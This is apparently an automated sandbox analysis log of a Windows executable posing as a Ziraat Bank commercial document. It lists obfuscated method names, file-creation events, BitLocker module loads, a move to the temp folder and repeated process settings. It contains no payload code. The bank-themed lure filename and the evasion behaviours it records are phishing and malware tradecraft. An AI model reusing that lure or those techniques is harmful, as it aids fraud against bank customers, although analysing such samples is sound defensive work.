          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, if2je5AfxZ9xybvf7q.csHigh entropy of concatenated method names: 'Rpw4kmk6R', 'rC3ZgrbpA', 'ArRxbbEiN', 'kWZB2qvv7', 'CNcpPqYFQ', 'DWfbNGeEF', 'T9Hmvux29ao9X06RBZ', 'q57UkcSVnXqZtxWQLR', 'GF8SeptpciuQZyjV8c', 'Easc451Ic'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, lDLPAgubLZmDc1jo0b.csHigh entropy of concatenated method names: 'RCYUhABkfU', 'A8aUywbXM3', 'amsUO4ghM9', 'MZ3U9IYaXU', 'LpUUlOk385', 'IahUkk2g2F', 'rmfVelmx6AAIyvdfc0', 'R69o2XGWK9QnvAx8bM', 'UgmUUDWHAA', 'V7pU8N2rLb'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, nBSBY0USmCp6UlQn8P9.csHigh entropy of concatenated method names: 'k2kDiGZAZw', 'hbpDISbqX8', 'g1LD4TSL1M', 'xpPDZDbhfs', 'Ku6DeYEQO9', 'L8vDxE2YXX', 'QrdDBC2qAI', 'AXcD3wYdjH', 'T8GDp5g0Ev', 'e0YDblXu1U'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, RXQHt8MxC3c30aRuOb.csHigh entropy of concatenated method names: 'E3hcY95iUr', 'riUcQAmEKh', 'bVpcgyP9Kw', 'Rm4cnIIePQ', 'S79c2cgJxc', 'a4mchSE6XO', 'rVYcyPe0So', 'hSncRlGjNI', 'wogcO1y8Wx', 'VMFc9S8Syr'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, qDqu03FSbprfe5fHqv.csHigh entropy of concatenated method names: 'fT3DUt5w8p', 'kHyD8EUV34', 'QQSDu7ctHX', 'VrTDYSG0uE', 'c5ZDQGtVT3', 'RrCDnsAOwt', 'UboD2c71Tf', 'ymEcEvMbhj', 'f4ScMQ6auw', 'qZ0c5VXeAS'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, m3pNODCGVrM93eChwL.csHigh entropy of concatenated method names: 'hV2hYMysBI', 'HAZhg9PN01', 'WUuh27bNeb', 'TPa2FmE6pi', 'zSc2zCCrsb', 'IkMhSL1ZCf', 'qNchUI9h0Q', 'PCDhAhj5HB', 'Bm3h8VICtf', 'RSKhuPw1Pk'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.csHigh entropy of concatenated method names: 'V468tBAqUq', 'qLy8YRrpFp', 'LOF8QEn16d', 'Uyq8gne6Bl', 'YVk8nDXwjN', 'rQE82W1ape', 'gAS8hwoSZU', 'AK48yPejpE', 'QMX8RQ1vP6', 'snH8OJKENB'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, faXU0HbFn0VlcvpUOk.csHigh entropy of concatenated method names: 'I3wneRjP0w', 'uRJnBHL1Up', 'LyUgJjOSK8', 'sJ9gWJap9d', 'kY1goBhSqc', 'apjgX6W0vA', 'p3NgCqbmSV', 'sUxgvcf6OI', 'AKng7NnK9Z', 'k3FgdffWHU'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, biZFxcfOtcCauKkLje.csHigh entropy of concatenated method names: 'XS2ldTqYyn', 'LmnlqAmuwk', 'pl6lfk09Nw', 'vTblrMt0w4', 'Twjl0Ue7oj', 'lUmlJMUirv', 'DbflWyfNA8', 'i2ylos3jTn', 'h2ilXlb4bX', 'OmflCRasDy'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, TT73LD5OHsE90YrMpZ.csHigh entropy of concatenated method names: 'YNycHcn2CB', 'IWIc0snEhg', 'yHjcJr5eQ9', 'ceocW5HDm6', 'w0FcfhmMVO', 'VjOcoc7nt8', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, ks342GU8C1HljVtJCjj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lTO6f6ESnq', 'JlA6rYgC4C', 'ptZ6who8Tv', 'Pm26K2eCYW', 'vTI6PRaVEM', 'Xlv6Vu0la1', 'uH16EYLemr'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, N2NLe9WAC5M2YZ7daw.csHigh entropy of concatenated method names: 'Kok2aqovIx', 'U4g2iFPhj7', 'fTu24behCk', 'tRh2ZOom9a', 'bSI2xloAgX', 'yIT2B7D8KE', 'J4L2pQM7UB', 'z9l2bn54el', 'vd80GTLsF0lpImu5SbU', 'qkF1YQLpQn1E6xFWcGT'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, mo84m9QlATiWAUgsJh.csHigh entropy of concatenated method names: 'Dispose', 'XCcU5bKnyp', 'jWyA0FmB9J', 'mkURRZApnL', 'OfXUFQHt8x', 'L3cUz30aRu', 'ProcessDialogKey', 'mbKAST73LD', 'lHsAUE90Yr', 'WpZAAcDqu0'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, AaaHTYzxBUD3nMVHpF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Fe1DmaHn5Z', 'oKeDlrSfrS', 'lKGDkKx1g0', 'jx7DNOG8me', 'gv2DcOHTEh', 'nUrDDmvV2S', 'MoTD65ecEF'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, sVaoHKVfv5Ch2ndaHT.csHigh entropy of concatenated method names: 'l5BNM0TPii', 'cpJNFpT9m5', 'NV9cSZ3NOF', 'hTFcUdkCJt', 'xiBNLMZXo5', 'CjZNqgvkHS', 'LFRNG9VQDp', 'UWSNfrF7gJ', 'PPLNrWriah', 'rj6Nw4qilD'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, E85WahHk2g2F6eF9qk.csHigh entropy of concatenated method names: 'GDx2tF8QmD', 'tkb2QXXLtt', 'XGn2niIbcs', 'g5I2ht7XX4', 'AeW2ydf91b', 'jB5nPYNy2F', 'CHmnVXFE57', 'JIbnECkbZA', 'QrbnM1wGh7', 'Vp4n5OxkWq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, mRlBeO0VGrHIxDxtWq.csHigh entropy of concatenated method names: 'V1sEHKLuPWfCak5WJAW', 'vhNaQOLnxqIRQTgXF1S', 'KIQ2cyNEiB', 'UDt2DeaDyR', 'pP626OAj29', 'oxCZDBLF14Gm3L26g4F', 'd3UVXNLJKOKLWCKTBYM'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, rOMlg0K8fJ6ULvns4I.csHigh entropy of concatenated method names: 'GUyNOuAypo', 'KFTN9sfNuM', 'ToString', 'ScgNYqJ77K', 'bwcNQahg0m', 's7sNg0kXlJ', 'i0BNnPtZdu', 'JrqN2roJcA', 'JCdNhkFrhk', 'Hj9Ny0NRnx'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, fABkfU3Z8awbXM3bZr.csHigh entropy of concatenated method names: 'XbyQf6YqD1', 'HOIQrGTJCy', 'tStQwc9pxB', 'VGjQK9oK6g', 'QF6QPc9Aqm', 'PREQVJvZkX', 'ztGQEF1D3a', 'nlVQMc27hA', 'BRmQ5ytT2u', 'eTsQFhblXX'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, aOwyEqwyrju2kXFDoT.csHigh entropy of concatenated method names: 'ToString', 'RpEkLK9qWF', 'IjNk0oMMI8', 'Vk4kJfTe5g', 'qPLkWvHuNe', 'IockoeZTwU', 'o7AkXNvs69', 'xXmkCaH8Tx', 'pXJkvceUps', 'z5bk7dpQba'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, qDFOWtG9VuR5pdyc2O.csHigh entropy of concatenated method names: 'h9om3XPIBf', 'XlHmpe2i8U', 'SCGmHMs6On', 'T0Ym0UsEtC', 'LpGmW2QLqy', 'bSsmo268mH', 'LURmC7kBjg', 'LjHmv0qQuV', 'MKfmdLMmTe', 'DgEmLJtyS7'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, oZUwic70lEwBnIGtjJ.csHigh entropy of concatenated method names: 'OlOhiopZq2', 'YmdhIKa9HC', 'e5fh4xfBA7', 'wrJhZ0ImwD', 'iXgheRr01y', 'RL6hxaGjmw', 'mQuhBeVAGy', 'kvAh3Yvj79', 'cwmhp2uarV', 'ul6hbbxhBq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, MREV3Spms4ghM97Z3I.csHigh entropy of concatenated method names: 'ClvgZwrpfI', 'xdZgxtfJfF', 'Mv3g31pK3Y', 'mMfgp0JTkx', 'GdqglUrcaP', 'mqxgk6yCwF', 'wohgNfWmy6', 'VQfgc4PWXv', 'MHSgDGPK5G', 'iVvg6AsENk'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, if2je5AfxZ9xybvf7q.csHigh entropy of concatenated method names: 'Rpw4kmk6R', 'rC3ZgrbpA', 'ArRxbbEiN', 'kWZB2qvv7', 'CNcpPqYFQ', 'DWfbNGeEF', 'T9Hmvux29ao9X06RBZ', 'q57UkcSVnXqZtxWQLR', 'GF8SeptpciuQZyjV8c', 'Easc451Ic'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, lDLPAgubLZmDc1jo0b.csHigh entropy of concatenated method names: 'RCYUhABkfU', 'A8aUywbXM3', 'amsUO4ghM9', 'MZ3U9IYaXU', 'LpUUlOk385', 'IahUkk2g2F', 'rmfVelmx6AAIyvdfc0', 'R69o2XGWK9QnvAx8bM', 'UgmUUDWHAA', 'V7pU8N2rLb'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, nBSBY0USmCp6UlQn8P9.csHigh entropy of concatenated method names: 'k2kDiGZAZw', 'hbpDISbqX8', 'g1LD4TSL1M', 'xpPDZDbhfs', 'Ku6DeYEQO9', 'L8vDxE2YXX', 'QrdDBC2qAI', 'AXcD3wYdjH', 'T8GDp5g0Ev', 'e0YDblXu1U'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, RXQHt8MxC3c30aRuOb.csHigh entropy of concatenated method names: 'E3hcY95iUr', 'riUcQAmEKh', 'bVpcgyP9Kw', 'Rm4cnIIePQ', 'S79c2cgJxc', 'a4mchSE6XO', 'rVYcyPe0So', 'hSncRlGjNI', 'wogcO1y8Wx', 'VMFc9S8Syr'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, qDqu03FSbprfe5fHqv.csHigh entropy of concatenated method names: 'fT3DUt5w8p', 'kHyD8EUV34', 'QQSDu7ctHX', 'VrTDYSG0uE', 'c5ZDQGtVT3', 'RrCDnsAOwt', 'UboD2c71Tf', 'ymEcEvMbhj', 'f4ScMQ6auw', 'qZ0c5VXeAS'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, m3pNODCGVrM93eChwL.csHigh entropy of concatenated method names: 'hV2hYMysBI', 'HAZhg9PN01', 'WUuh27bNeb', 'TPa2FmE6pi', 'zSc2zCCrsb', 'IkMhSL1ZCf', 'qNchUI9h0Q', 'PCDhAhj5HB', 'Bm3h8VICtf', 'RSKhuPw1Pk'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.csHigh entropy of concatenated method names: 'V468tBAqUq', 'qLy8YRrpFp', 'LOF8QEn16d', 'Uyq8gne6Bl', 'YVk8nDXwjN', 'rQE82W1ape', 'gAS8hwoSZU', 'AK48yPejpE', 'QMX8RQ1vP6', 'snH8OJKENB'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, faXU0HbFn0VlcvpUOk.csHigh entropy of concatenated method names: 'I3wneRjP0w', 'uRJnBHL1Up', 'LyUgJjOSK8', 'sJ9gWJap9d', 'kY1goBhSqc', 'apjgX6W0vA', 'p3NgCqbmSV', 'sUxgvcf6OI', 'AKng7NnK9Z', 'k3FgdffWHU'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, biZFxcfOtcCauKkLje.csHigh entropy of concatenated method names: 'XS2ldTqYyn', 'LmnlqAmuwk', 'pl6lfk09Nw', 'vTblrMt0w4', 'Twjl0Ue7oj', 'lUmlJMUirv', 'DbflWyfNA8', 'i2ylos3jTn', 'h2ilXlb4bX', 'OmflCRasDy'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, TT73LD5OHsE90YrMpZ.csHigh entropy of concatenated method names: 'YNycHcn2CB', 'IWIc0snEhg', 'yHjcJr5eQ9', 'ceocW5HDm6', 'w0FcfhmMVO', 'VjOcoc7nt8', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, ks342GU8C1HljVtJCjj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lTO6f6ESnq', 'JlA6rYgC4C', 'ptZ6who8Tv', 'Pm26K2eCYW', 'vTI6PRaVEM', 'Xlv6Vu0la1', 'uH16EYLemr'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, N2NLe9WAC5M2YZ7daw.csHigh entropy of concatenated method names: 'Kok2aqovIx', 'U4g2iFPhj7', 'fTu24behCk', 'tRh2ZOom9a', 'bSI2xloAgX', 'yIT2B7D8KE', 'J4L2pQM7UB', 'z9l2bn54el', 'vd80GTLsF0lpImu5SbU', 'qkF1YQLpQn1E6xFWcGT'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, mo84m9QlATiWAUgsJh.csHigh entropy of concatenated method names: 'Dispose', 'XCcU5bKnyp', 'jWyA0FmB9J', 'mkURRZApnL', 'OfXUFQHt8x', 'L3cUz30aRu', 'ProcessDialogKey', 'mbKAST73LD', 'lHsAUE90Yr', 'WpZAAcDqu0'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, AaaHTYzxBUD3nMVHpF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Fe1DmaHn5Z', 'oKeDlrSfrS', 'lKGDkKx1g0', 'jx7DNOG8me', 'gv2DcOHTEh', 'nUrDDmvV2S', 'MoTD65ecEF'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, sVaoHKVfv5Ch2ndaHT.csHigh entropy of concatenated method names: 'l5BNM0TPii', 'cpJNFpT9m5', 'NV9cSZ3NOF', 'hTFcUdkCJt', 'xiBNLMZXo5', 'CjZNqgvkHS', 'LFRNG9VQDp', 'UWSNfrF7gJ', 'PPLNrWriah', 'rj6Nw4qilD'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, E85WahHk2g2F6eF9qk.csHigh entropy of concatenated method names: 'GDx2tF8QmD', 'tkb2QXXLtt', 'XGn2niIbcs', 'g5I2ht7XX4', 'AeW2ydf91b', 'jB5nPYNy2F', 'CHmnVXFE57', 'JIbnECkbZA', 'QrbnM1wGh7', 'Vp4n5OxkWq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, mRlBeO0VGrHIxDxtWq.csHigh entropy of concatenated method names: 'V1sEHKLuPWfCak5WJAW', 'vhNaQOLnxqIRQTgXF1S', 'KIQ2cyNEiB', 'UDt2DeaDyR', 'pP626OAj29', 'oxCZDBLF14Gm3L26g4F', 'd3UVXNLJKOKLWCKTBYM'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, rOMlg0K8fJ6ULvns4I.csHigh entropy of concatenated method names: 'GUyNOuAypo', 'KFTN9sfNuM', 'ToString', 'ScgNYqJ77K', 'bwcNQahg0m', 's7sNg0kXlJ', 'i0BNnPtZdu', 'JrqN2roJcA', 'JCdNhkFrhk', 'Hj9Ny0NRnx'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28edd60.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28e4748.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exe
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exeJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile created: \ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Moves itself to temp directory
          Source: c:\users\user\desktop\ziraat bankasi_try m#u00fc#u015fteri no_11055699-1034 nolu ticari 26.09.2024.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG612.tmpJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
